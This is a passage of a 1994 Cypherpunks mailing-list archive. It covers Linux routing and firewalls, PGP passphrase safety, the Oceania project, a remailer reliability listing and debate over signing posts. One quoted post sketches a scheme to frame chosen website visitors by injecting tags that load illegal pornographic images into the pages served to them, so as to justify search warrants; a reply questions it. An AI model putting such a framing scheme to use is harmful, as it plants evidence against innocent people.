versions that are not expected to be stable, which is why it's not what you get on Yggdrasil. Release 1.2 is coming Real Soon Now. You can get the development kernels, and I think the Y. CD has a tar file with a fairly recent 1.1.x kernel. I also recommend using a bus mouse. I'm using the Logitech bus mouse; I previously had used a Microsoft serial mouse. I get a lot better performance from the bus mouse - my cursor moves when I move the mouse, with much greater reliability than the serial mouse did. (I mentioned using Linux for a firewall router) >Could this be done via dialup? I can get into a dialup SLIP server >which dynamically assigns addresses, and I just in the past week got >my Linux box to connect to it. It might be possible to make a router work on a LAN with dynamic addresses, but I doubt it. Much better would be to either apply to InterNIC for a class C network number, or ask your service provider to assign you a whole subnet of addresses for yourself (if they only do dynamic addressing, they probably won't want to do this. They may be reluctant in yielding up any of their address space in any case.) >Also, what is the difference between a router, a gateway, and a >firewall? A router connects two different cables, which may be of the same or different physical media, so that IP packets can hop from one cable to another. The router also knows how to direct packets that are meant for distant destinations: it passes them on to the next router. One might connect two ethernets with a router, or an ethernet and a SLIP/PPP modem connection. Routers are also often referred to as gateways, but I prefer the more precise meaning, in which a gateway is a machine that connects two incompatible networking protocols, by translating the higher level services. For example, there are Internet SMTP to UUCP mail gateways in every Unix box, as well as the Internet/CompuServe and Internet/AOL gateways. There are other kinds, such as the network file service gateways to allow Macintoshes to do AppleShare mounts from an NFS server - the FastPath and Gator boxes do an NFS mount from the fileserver, then act as appleshare servers. When a Mac reads a file using AppleShare, the gateway reads the file using NFS and passes along the results. A firewall is a single point of connection between a "protected" and a "public" network. It is usually combined with a router. It uses such things as filtering packets based on protocol, port number, source and destination addresses to try to keep hackers out of a network. Services which are desired to run through the firewall, but which are risky, are handled by proxy servers on the firewall, so in this sense it is a gateway. There is a very good book out on this topic, from the folks who maintain AT&T's firewall, entitled Firewalls and Internet Security, by William R. Cheswick and Steven M. Bellovin, ISBN 0-201-63357-4. I recommend it to anyone who runs a machine on the Internet - and to anyone who wishes to penetrate one: it has a pretty detailed guide on how to hack machines. (The authors recommend subscribing to 2600 magazine!) You don't need to have a firewall to tighten up the security on your machine. Read this book if you're going to put a Unix box of any sort on the Internet, or you might wake up some day to find someone's erased your hard disk from the other side of the globe. To be complete, I should also mention bridges. A bridge is a sort of primitive router, that connects two or more LAN sections. The sections have the same physical media. This is done for fault isolation, to extend the maximum cable length, to allow star topology on bus nets like ethernet, and to reduce traffic on the whole net somewhat (the bridges don't pass packets that are destined for the same cable segment that they originated on, but they do pass broadcast packets). Bridges used in organizations that require multiple protocols on the same net (eg., AppleTalk and IP). Twisted Pair Ethernet Hubs are a sort of bridge. There is a serious problem with bridges, in that they make the entire network appear to be on the same segment of cable to higher-level protocols, so an IP broadcast will stimulate every machine on the campus net. When I was at CERN, working on the NA47 experiment, I would do "ruptime | grep na47" to find what workstations were lightly loaded in my building. This resulted in the central network police bearing down on my experiments sysadmin, as my broadcasts were asking every machine in the lab - thousands! - what their load was, and they were all responding simultaneously. (In such a case it is a much better idea to use multiprotocol routers - I can't fathom why CERN doesn't do this.) >> There is a security enhancement I mean to try once I've set up my own >> full-time router... >Be sure to post to comp.os.linux.announce when this is available! I will, of course. Another idea is to foil dictionary attack on my passwd file by varying the encryption algorithm somewhat. It won't necessarily be a more secure algorithm, but to hack my password file you'd have to run a dictionary attack just for my machine. I'm not so convinced that the Cypherpunks list wants to hear all this, but it's probably of interest to you that Linux is the cheapest way to get complete Unix/X11 development tools on a machine that you can be root on. Most of you can't edit the password file, tinker on the kernel, or reboot your campus Unix machines, but if you have at least a 386 you can do all this. If you wanted to make, say, a hardware encryption card for Unix, you'd be best off using Linux so you'll have the full kernel sources to ease writing your device driver. Regards, Michael D. Crawford crawford at scruznet.com <- Please note change of address. crawford at maxwell.ucsc.edu <- Finger me here for PGP Public Key. From tcmay at netcom.com Mon Dec 5 00:37:50 1994 From: tcmay at netcom.com (Timothy C. May) Date: Mon, 5 Dec 94 00:37:50 PST Subject: Oceania? In-Reply-To: Message-ID: <199412050839.AAA11133@netcom18.netcom.com> Johnathan Corgan wrote: > I had come across a reference to this in Tim's CYPHERNOMICON. > > Was this whole project a giant scam? Has this been objectively > demonstrated, or just suspected/believed? ... > Could someone bring me up to speed on this group? On the surface, it > would seem that there is a lot in common with their objectives and the > general Cypherpunks "philosophy". (quotes because I understand the > diversity of thought in this group.) I won't say it's a scam, but a lot of people think it is/was. I thought it had died some months back, when all posts (of which there had previously been many) suddnly stopped. The idea of soliciting "contributions" to fund some kind of seagoing barge, sinkable with a single torpedo (anonymous delivered, easily enough), is crazy. If changes are going to occur, it won't be by collecting dribs and drabs of small change from suckers who think they'll someday be "living off the sea, consulting via satellite dish." (That's not a direct quote, just my gleaning of the Oceania philosophy.) They're out to lunch, or scam artists, or hopeless dreamers, or all of the above. Gone to Roatan. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay From joshua at dee.retix.com Mon Dec 5 01:30:02 1994 From: joshua at dee.retix.com (joshua geller) Date: Mon, 5 Dec 94 01:30:02 PST Subject: Oceania? In-Reply-To: <199412050839.AAA11133@netcom18.netcom.com> Message-ID: <199412050931.BAA02640@sleepy.retix.com> I thought it was 'gone to croatoa'. josh From lmccarth at ducie.cs.umass.edu Mon Dec 5 02:19:36 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 5 Dec 94 02:19:36 PST Subject: public accounts / PGP / passphrases Message-ID: <199412051024.FAA00972@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Thanks to Derek, Jonathan, Rich, Mike Duvos, and Scott Collins for the responses to my query. It seems everyone agrees that the PGP private key is not trivially breakable without the pass phrase, so I'm keeping my pass phrase. All of the techniques mentioned were familiar to me, except this bit from Mike Duvos: > Given the state of Unix security, I would certainly not want to > type my passphrase into a Unix box unless I was the only user, > was directly connected to the box through a wire I could see, and > had just done a fresh boot after verifying the MD5 hash on all > the OS binaries. Could you clarify where the `clean' copy of the hash of the OS is being stored, if not on the machine in question ? I must confess that I'm not personally prepared to push my machine into an early grave by rebooting before I sign or encrypt anything. Besides, I'd be pushing _myself_ into an early grave if I did that. YMMV. I have a 386 at home, on which I suppose I could run PGP, but that doesn't help. Why ? Simply because going home to dial in is a major inconvenience. Leaving aside my unwillingness to stay home in the evening just to use my public account, it's utterly impossible for me to leave work during the day whenever I want to use PGP. The only solution I can imagine is to keep a notebook computer running Linux at work, and dial in to the DECstation five feet away from my desk at work. I've no idea how to convince the tech staff here to add a dedicated phone line to my lab for this purpose. Any better suggestions on using PGP safely during the workday ? - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuLpDGf7YYibNzjpAQEu5gP8CVtFJwKVGalnl8c4F52vrfzK7NV3JRMh AB2w9L8ePbpggSM65YGN4kkuUyS8BMi6sbLUS2GtupVK6/vaKK/kDngKMIB+XS5D GOLbKy8iieEm7NEwO5C4cwV8qnRorQ1Ox+l+LaGPOc/pl+ecT4rJtEGlBbj9NZV0 4p8E6Kw/66w= =BMWc - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuLqOCoZzwIn1bdtAQHdcwF9FjHQgEomyI/m8ShddvEhCCbq4qbhPwEQ NMk4ookuD8nTs0/ov3DKqDHfQrxwjeTU =5rbF -----END PGP SIGNATURE----- From lmccarth at ducie.cs.umass.edu Mon Dec 5 02:47:14 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Mon, 5 Dec 94 02:47:14 PST Subject: making public keys public Message-ID: <199412051051.FAA01191@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Eric Hughes writes: > > If you're not going to make the public key public, why use public key > > cryptography at all ? Save time and effort and use a symmetric cipher. > > You can't do authentication with a shared secret key, because there's > nothing to differentiate the two sides of the link. Is it really important to distinguish the two sides ? The additional threat is that an attacker could spoof my correspondent to me, once she's grabbed my secret key. But a) I thought we were assuming that other people being spoofed is _their_ problem, not ours, and b) if she's nabbed my key, odds are she's hacked my account anyway, leaving me with much larger problems. > In addition, a closely held public key might be held by 10 people; Hmm, `closely-held' suggests that the `public' key is being passed around as a secret over some channels, in which case it might as well be a secret key being passed around over those channels to the 10 people. > with secret keys there are 90 different private keys instances to > manage. Wouldn't there only be 45 ? I agree that this is quite a few, but it's a reasonable tradeoff between disk space and processing speed unless you're communicating with a large number of people. - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuLvdWf7YYibNzjpAQG0GQP9FIJkCLF4XbZEoydrVfCnHg32FGL5EQ1A 2286GqvVQuy6hwtqV888TOZmLkQpMjrmq+paTQpozu5s8L4z/L9WZbbyk0C/alMv faTwpUe1neSStR3KbrxK0BuP70OBKBbdZZfHI/t4Kn8jTimeBA/IG2Iou/8gecX2 g8d0otexmwI= =FtUZ - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuLwpyoZzwIn1bdtAQFUfgGAsdDHynQfWLxX+cmCz9vxkzwQ0sIikuVG XCp0rwhl/C1P1HXBF2Xk135HXa7RO6kC =OnyQ -----END PGP SIGNATURE----- From frissell at panix.com Mon Dec 5 04:22:00 1994 From: frissell at panix.com (Duncan Frissell) Date: Mon, 5 Dec 94 04:22:00 PST Subject: future entrapment Message-ID: <199412051220.AA29286@panix.com> >>* establish a local WWW server hosting some useful information >>* configure the server to record the IP addresses of people who >> access it, and cross-reference them to obtain geographical >> locations as registered with NIC. Feed this into a GIS and >> track local accesses. >>* have a list of people who I want to nail. >>* filter all HTTP requests through a script that >> - checks the list of victims >> - if a request for a file comes in from one of the >> targets, munge the outgoing web page to include >> a tag pointing to a foreign site >> carrying images deemed pornographic in my jurisdiction >> - ring the console bell >> >>As soon as someone on the hit list downloads a file, you have prima >>facie evidence that they are probably in posession of some kiddie porn. >>Instant search warrant time ... "But your Honor, I had graphics turned off for speed." "The Geheimestaat Polezi has to prove not only that I connected but that I actually got something." "Too bad my swap file is on a partition that was corrupted when the ossifers grabbed my machine." The ancient question, do you possess something if it is encoded and cannot be decoded? DCF From roy at cybrspc.mn.org Mon Dec 5 05:40:14 1994 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Mon, 5 Dec 94 05:40:14 PST Subject: E-money Good or Bad? In-Reply-To: Message-ID: <941205.070835.9O5.rusnews.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- In list.cypherpunks, KDAGUIO at aba.com writes: > Let me ask you a question. If people can communicate over the > net anonymously, tranmit unreadable messages, and transfer > unlimited amounts of fully anonymous money, haven't you, in > addition to protecting some of the interests of minorities, also > perfected a mechanism by which people with evil intent can engage > in criminal activities completely unobserved and with no fear of > prosecution? This has been hashed almost to death before. The use of crypto does not remove the fear of prosecution. It only makes it more difficult to intercept messages in transit. Actions at both ends of the transaction will still be visible to some extent. We don't have any duty to make law enforcement's job easier, especially at the cost of our privacy. - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org PGP public key available by mail echo /get /pub/pubkey.asc | mail file-request at cybrspc.mn.org These are, of course, my opinions (and my machines) -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuMR9hvikii9febJAQGegAP9H5iw3Gip8uxzZD0tnU0KjPfNRvxHx8VQ JTU3PvO1EMOrSzebI6BRdhXFMEe//tAYEe51yxK5/8s1rYGEckMETigFw2Forirf /gabSw590tFAiPd1y+l2fdishEwXx0Pc67MBj4QKwgeW40AE2/aD7RR8vHkGy4CU 60chibeOiyQ= =ZKfb -----END PGP SIGNATURE----- From jcorgan at netcom.com Mon Dec 5 06:24:34 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Mon, 5 Dec 94 06:24:34 PST Subject: Date? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > Is it really Christmas eve already where you are? Hehe, you caught me fiddling with my system date to generate a 2048 bit key with PGP. Actually, if it were Christmas Eve already, that would mean that the pain of holiday shopping had already past.... ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuMiW01Diok8GKihAQFs0QP/UplPL2g2t86goL1o5xK3gkv9IM6nGeEW GCe41PX3Q4yiYkopIz+1bXe9kGYvrd9jJ0fusM9CRp+QnaiizzZxudAL7BGRlsGD 9c0jLLR9KtFmiiSQM5pgBIMEzXC3zPY+Xm+hPhV6/URx84qxrcjneOrnOJjBtjkO ekZ8ApHUhxo= =wNu9 -----END PGP SIGNATURE----- From asgaard at sos.sll.se Mon Dec 5 06:32:01 1994 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Mon, 5 Dec 94 06:32:01 PST Subject: Oceania? In-Reply-To: <199412050839.AAA11133@netcom18.netcom.com> Message-ID: Timothy C. May wrote: > They're out to lunch, or scam artists, or hopeless dreamers, or all of > the above. Gone to Roatan. Charging $250 for an Oceania passport supports the scam theory. Mats From raph at CS.Berkeley.EDU Mon Dec 5 06:49:59 1994 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Mon, 5 Dec 94 06:49:59 PST Subject: List of reliable remailers Message-ID: <199412051450.GAA13989@kiwi.CS.Berkeley.EDU> I operate a remailer pinging service which collects detailed information about remailer features and reliability. To use it, just finger remailer-list at kiwi.cs.berkeley.edu There is also a Web version of the same information, at: http://www.cs.berkeley.edu/~raph/remailer-list.html This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at: ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.30.tar.gz For the PGP public keys of the remailers, as well as some help on how to use them, finger remailer.help.all at chaos.bsu.edu This is the current info: REMAILER LIST This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu. $remailer{"vox"} = " cpunk pgp. post"; $remailer{"avox"} = " cpunk pgp post"; $remailer{"extropia"} = " cpunk pgp special"; $remailer{"portal"} = " cpunk pgp hash"; $remailer{"alumni"} = " cpunk pgp hash"; $remailer{"bsu-cs"} = " cpunk hash ksub"; $remailer{"rebma"} = " cpunk pgp hash"; $remailer{"jpunix"} = " cpunk pgp hash latent cut post ek"; $remailer{"c2"} = " eric pgp hash"; $remailer{"soda"} = " eric post"; $remailer{"penet"} = " penet post"; $remailer{"ideath"} = " cpunk hash ksub"; $remailer{"usura"} = " cpunk pgp. hash latent cut post"; $remailer{"desert"} = " cpunk pgp. post"; $remailer{"nately"} = " cpunk pgp hash latent cut"; $remailer{"myriad"} = " cpunk pgp hash latent cut ek"; $remailer{"xs4all"} = " cpunk pgp hash latent cut post ek"; $remailer{"flame"} = " cpunk pgp hash latent cut post ek"; $remailer{"rahul"} = " cpunk"; $remailer{"mix"} = " cpunk hash latent cut ek"; catalyst at netcom.com is _not_ a remailer. Last ping: Mon 5 Dec 94 6:00:01 PST remailer email address history latency uptime ----------------------------------------------------------------------- xs4all remailer at xs4all.nl ++##******+* 7:31 99.99% usura usura at xs4all.nl ++##******-* 13:31 99.99% alumni hal at alumni.caltech.edu +##**-*+*+** 11:24 99.99% penet anon at anon.penet.fi +++++++++*** 1:00:13 99.99% c2 remail at c2.org +****-++++-- 37:40 99.96% flame tomaz at flame.sinet.org ***#***+*++* 8:43 99.92% nately remailer at nately.ucsd.edu ++++++++++++ 44:54 99.92% portal hfinney at shell.portal.com ###*-****** 6:46 99.85% jpunix remailer at jpunix.com ###****+*++* 8:11 99.83% vox remail at vox.xs4all.nl .-.-------- 10:32:31 99.99% desert remail at desert.xs4all.nl ----------- 8:03:49 99.99% myriad remailer at myriad.pc.cc.cmu.edu ###*****+** 5:11 99.70% rahul homer at rahul.net ###**** **** 4:32 99.37% bsu-cs nowhere at bsu-cs.bsu.edu #*.# ** *+-* 50:33 99.05% mix mixmaster at nately.ucsd.edu -+-+- 59:51 98.94% ideath remailer at ideath.goldenbear.com ###**** *** 8:21 98.77% extropia remail at extropia.wimsey.com +---.--+++ 3:59:21 98.42% rebma remailer at rebma.mn.org -_.--..*-.. 22:38:33 98.13% soda remailer at csua.berkeley.edu -....-. 12:55:27 86.22% For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html History key * # response in less than 5 minutes. * * response in less than 1 hour. * + response in less than 4 hours. * - response in less than 24 hours. * . response in more than 1 day. * _ response came back too late (more than 2 days). Options and features cpunk A major class of remailers. Supports Request-Remailing-To: field. eric A variant of the cpunk style. Uses Anon-Send-To: instead. penet The third class of remailers (at least for right now). Uses X-Anon-To: in the header. pgp Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID. oldpgp Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine. hash Supports ## pasting, so anything can be put into the headers of outgoing messages. ksub Remailer always kills subject header, even in non-pgp mode. nsub Remailer always preserves subject header, even in pgp mode. latent Supports Matt Ghio's Latent-Time: option. cut Supports Matt Ghio's Cutmarks: option. post Post to Usenet using Post-To: or Anon-Post-To: header. special Accepts only pgp encrypted messages. ek Encrypt responses in relpy blocks using Encrypt-Key: header. Comments and suggestions welcome! Raph Levien From PITCC05.KENNED09 at SSW.ALCOA.COM Mon Dec 5 07:12:27 1994 From: PITCC05.KENNED09 at SSW.ALCOA.COM (William A. Kennedy) Date: Mon, 5 Dec 94 07:12:27 PST Subject: cypher bickering Message-ID: internet: kenned09 at ssw.alcoa.com I am a relatively new member to this list. There is so much potential for great discussion because the topic is technically challenging and politically sensative. That's why it is extremely frustrating to see the list contributors, and it's moderator getting all tied up in their collective underwear over whether or not the moderator can and/or force people to affix a digital signature to every posting. What's worse, they seem to stay up through the night just to bicker about it. In the paper world, I send out many things that I don't sign. I don't sign them because it is of no significance that it be proven that I sent it. It also might be that the information is of such a general nature that it makes no neverminds who sent it. I submit that digital signatures are the same way. But, as Tim May proposed, it could be the "secret-decoder-ring" phenomenon at work. By digitally signing all of our postings we prove that we are committed members of the "cause." But to whom are we proving our dedication. We would be demonstrating it to people who, by nature of their own interest in this list, are already committed. Oh, but wait a minute. Maybe we're afraid that people who don't even own digital signature software, are posting there ideas on our favorite subject. Isn't the posting of any ideas on cryptography by anyone more important than who's doing the posting? From PITCC05.KENNED09 at SSW.ALCOA.COM Mon Dec 5 07:13:05 1994 From: PITCC05.KENNED09 at SSW.ALCOA.COM (William A. Kennedy) Date: Mon, 5 Dec 94 07:13:05 PST Subject: crypto, why not catching on? Message-ID: internet: kennned09 at ssw.alcoa.com This is a response to Tim May's well-thought-out piece on "why cryptography has not caught on." I think cryptography _has_ caught on. There are people in the crypto debate now that weren't there two years ago; perhaps even one. I think we should not measure the commitment to the cryptography debate buy counting the amount of encrypted traffic . There just isn't that much that people send that needs to be encrypted. Our debate should, and does, focus on the rights of people to have the technical tools to insure the privacy of messages and other communication that they deem to be worthy of special handling. Thanks to people like Phil Zimmermann and Romana Michado, and many others I'm sure that I don't even know about, we have those technical tools and should now be fighting for the right to use them. Interestingly enough, I sent a message to Phil and got a response from his vacation program. In it he tells us that, if we think that our message to him needs to be encrypted, then please allow more time to get it read. From loofbour at cis.ohio-state.edu Mon Dec 5 07:31:19 1994 From: loofbour at cis.ohio-state.edu (Nathan Loofbourrow) Date: Mon, 5 Dec 94 07:31:19 PST Subject: Oceania? In-Reply-To: Message-ID: <199412051530.KAA09905@frankenstein.cis.ohio-state.edu> Mats Bergstrom writes: > Timothy C. May wrote: > > > They're out to lunch, or scam artists, or hopeless dreamers, or all of > > the above. Gone to Roatan. > > Charging $250 for an Oceania passport supports the scam theory. Then again, it may just belong in the "highly speculative" category. Much like the rich market now existing in Cuban property -- tied, of course, to a particular group that promises to overthrow Castro, then declare the property yours once the dictatorship is in place. Of course, for the price of Oceania, you could put together a nice "offshore" communications satellite. nathan From khijol!erc Mon Dec 5 08:11:08 1994 From: khijol!erc (Ed Carp [Sysadmin]) Date: Mon, 5 Dec 94 08:11:08 PST Subject: public accounts / PGP / passphrases In-Reply-To: <199412051024.FAA00972@bb.hks.net> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > Could you clarify where the `clean' copy of the hash of the OS is being > stored, if not on the machine in question ? On CD-ROM, or on removeable media which *you* control access. > I must confess that I'm not personally prepared to push my machine into an > early grave by rebooting before I sign or encrypt anything. Besides, I'd be > pushing _myself_ into an early grave if I did that. YMMV. > > I have a 386 at home, on which I suppose I could run PGP, but that doesn't > help. Why ? Simply because going home to dial in is a major inconvenience. > Leaving aside my unwillingness to stay home in the evening just to use my > public account, it's utterly impossible for me to leave work during the > day whenever I want to use PGP. The only solution I can imagine is to keep > a notebook computer running Linux at work, and dial in to the DECstation > five feet away from my desk at work. I've no idea how to convince the tech > staff here to add a dedicated phone line to my lab for this purpose. Any > better suggestions on using PGP safely during the workday ? What's the matter with running a serial cable from your laptop to the DEC? - -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi ** PGP encrypted email preferred! ** "What's the use of distant travel if only to discover - you're homeless in your heart." --Basia, "Yearning" -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLuM2cCS9AwzY9LDxAQHoVgP/XgRWz/wzTCfsmZ12zBedmb8ittibCFUd 2A/Gy0UlWm5eeLTK3+062pCOOYOVbjvobJmcrW2xc5432xEfBWK9XCEhdpTj1AG6 +hnsK4MYIe3OtacSJpdfQCAbFixd4Smo9PsLTcyXsfS2SHh2OutjqIpHEGJcCIHQ 6iapsOF9BQQ= =Uldx -----END PGP SIGNATURE----- From jcorgan at netcom.com Mon Dec 5 08:35:09 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Mon, 5 Dec 94 08:35:09 PST Subject: cypher bickering Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >In the paper world, I send out many things that I don't sign. I >don't sign them because it is of no significance that it be proven that I sent >it. It also might be that the information is of such a general nature that it >makes no neverminds who sent it. I submit that digital signatures are the same >way. While I agree with this, there is another, more practical reason to use cryptography for everyday, non-sensitive material. This may seem trivial to some. The more we are in the practice and *habit* of using cryptography for both privacy and authentication, the more *prepared* we are when we unexpectedly find ourselves in situations that *require* cryptography. YMMV. ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuNAhE1Diok8GKihAQHp7gQAkdsAdTXJ64y3DaHFTzWt5obBVHgDceBx 6nHq3z5gBDMuYWoJR3+8zoyf9wBS0s2N9knZ+1e1QkB2dOy8ntgVpddwaDVioyIH lMN5LW/VZ9IkufmisrM2/nnEcYCCT9hkact/VFTiveqPBZKkvBMa5XiCIRr+77Y/ hFtYuYfRrqY= =JL5c -----END PGP SIGNATURE----- From sinclai at ecf.toronto.edu Mon Dec 5 08:38:17 1994 From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N) Date: Mon, 5 Dec 94 08:38:17 PST Subject: Oceania? In-Reply-To: <199412050839.AAA11133@netcom18.netcom.com> Message-ID: <94Dec5.113742edt.3454@cannon.ecf.toronto.edu> -----BEGIN PGP SIGNED MESSAGE----- I used to be on the Oceania mailing list. From what I can tell, these guys are serious. I must admit, I was taken with the idea. Trade a few pairs of Levis for a Soviet warship and live in international waters. This design would have taken one or two torpedoes. About the time I left, they were thinking of floating concrete domes in the Sargasso sea. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAgUBLuNB3cyi36CIyUXVAQFzwwP+LcpOehNy72i42VHgTSGANebrKAI7naG5 eq1y3kAtzL2pG5vjNJnSA7ANWUZ9sfT6t4ymM0Rgsrpil+jvE1WNBDNoc3/8Gqgm yMh79QS1N/ceb0X4btbslUSdVUjUumdQzcKaAqOTTfqIbxGvoxsATVzIghDRBPDF f9vb5EQUk8Q= =KSch -----END PGP SIGNATURE----- From merriman at metronet.com Mon Dec 5 08:44:04 1994 From: merriman at metronet.com (David K. Merriman) Date: Mon, 5 Dec 94 08:44:04 PST Subject: public accounts / PGP / passphrases Message-ID: <199412051644.AA15039@metronet.com> -----BEGIN PGP SIGNED MESSAGE----- >> Leaving aside my unwillingness to stay home in the evening just to use my >> public account, it's utterly impossible for me to leave work during the >> day whenever I want to use PGP. The only solution I can imagine is to keep >> a notebook computer running Linux at work, and dial in to the DECstation >> five feet away from my desk at work. I've no idea how to convince the tech >> staff here to add a dedicated phone line to my lab for this purpose. Any >> better suggestions on using PGP safely during the workday ? > >What's the matter with running a serial cable from your laptop to the DEC? I may have missed earlier bits of this thread, so I'll simply point out that it is quite possible to run PGP from a floppy disk - either having the entire program on floppy, or just the keys. It's what I do when I may need access from an 'unsecure' machine. Dave Merriman -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuNCcMVrTvyYOzAZAQGpQwQAl6YMhg3oRGYnrfzpIDwTPGEEfyrGTrdO 0JR6Y/p0QAXKL5RjsOI8CdN2EBBZpOhNwGdxsttOr7wD/cXODty2Dw+U2RVNzj1X FAAnznFzvafROW8OfZo8+aCqS3ThYWWIme1D8seqEVsVfpD10us7SNoMkwSJLY8Y CMSxGy4rY6k= =gm/4 -----END PGP SIGNATURE----- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQCNAi3uZ2MAAAEEALWQtxX77SZSaFls6cVbPp+fZS4MNyKK3ZFYQo0qWyj+0tMq YgRTPRJRaCQixo63RttknogfPp514qdVMZw5iPeOXmD+RxrmTTwlbGqA7QUiG1x5 LG2Zims5zk4U6/rt8hwLh0/8E4lIb9r5d31qc8L1A9Twk/cmN8VrTvyYOzAZAAUR tClEYXZpZCBLLiBNZXJyaW1hbiA8bWVycmltYW5AbWV0cm9uZXQuY29tPokAlQMF EC6sAl+SAziJlog3BQEBxX8D/05ub986Io1PaGJgDtVlbMOPh2pjdB3QSpA8T7bh ngpsTbogz7LnFY6nLTH24dVswnzRGzX2XYN2FXQzYLEKpbuJPF85620EqEJt7eck kDSr0MdCorCZ3ntHGlaRIEOG8En7r/NUxtPJSbeANHyKV0pZTJ0ZF3p71yAZoCU1 JJWoiQCVAwUQLqcRtKljmJBIq8VdAQFFCQQAidBWF05UfZ3HdLTZ2BjhkiztbHIL fCMVAzMkNobRLH0jcQ+o4N9Ny7gAP2bHreadCYQAiyx24LWZaWB+LkG48vVXvSa1 Zv+ksrEp19U30jReTaDHMRg2IDQ0S7T/+YykWf4cx/L4x0ll55zfT29THWHVqpeA 4w0PnSBJubMsG6iJAJUCBRAt7mhNxWtO/Jg7MBkBAWyPA/9BYsA3G33jcg1SfuxC Fh4yMVZCBrvgK2FBJZUdxkgR1WfVYe5/GzV3jRzJxuXGdt0yzFb8HsocRUvnA4vi O6Jngza+seuc+dNC8X1LyyuW0rkogVZE6ds/v4qI2P+uticCh8xBLp7ieAjvGIcc tdQnXrMxF+w6V80cSy/dqxJjtg== =WVf6 -----END PGP PUBLIC KEY BLOCK----- - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at feenix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From lmccarth at bali.cs.umass.edu Mon Dec 5 09:14:43 1994 From: lmccarth at bali.cs.umass.edu (L. McCarthy) Date: Mon, 5 Dec 94 09:14:43 PST Subject: cypher bickering Message-ID: <199412051719.MAA04083@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- William A. Kennedy writes: > they seem to stay up through the night just to bicker about it. Nah, we'd be up anyway ;) Seriously, I don't think there's a practical issue, in light of the existence of Todd Masco's signing service. Perhaps at some time far in the future Eric will raise the stakes, but we can cross that bridge when we come to it. I simply changed my c'punks list alias to point to the signing service instead of the list itself, and everything else continues as before. Regarding placing a direct SLIP connection between my machine and the nearest workstation in the office, I will investigate the option. It may again be an issue to get permission to start plugging extra cables into a machine owned by the dept. - - -L. Futplex McCarthy; PGP key by finger or server "We've got computers, we're tapping phone lines; I know that that ain't allowed" --Talking Heads - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLuNJFmf7YYibNzjpAQEQqgP+MtmQ5enRtUigqo2iVSqRd+w3vAmGfR8Q rdnHCtUugxIf+70/jhS8RtyVGudVC4nBaqzaXRsSVAb0AlELClmsg85kDg74mAUi 59y+RCYWBFvMZ0wOuhq+9kohfASJK1k/VHOwZhnCLKyV+S5xZnn369e3KRVcurLJ 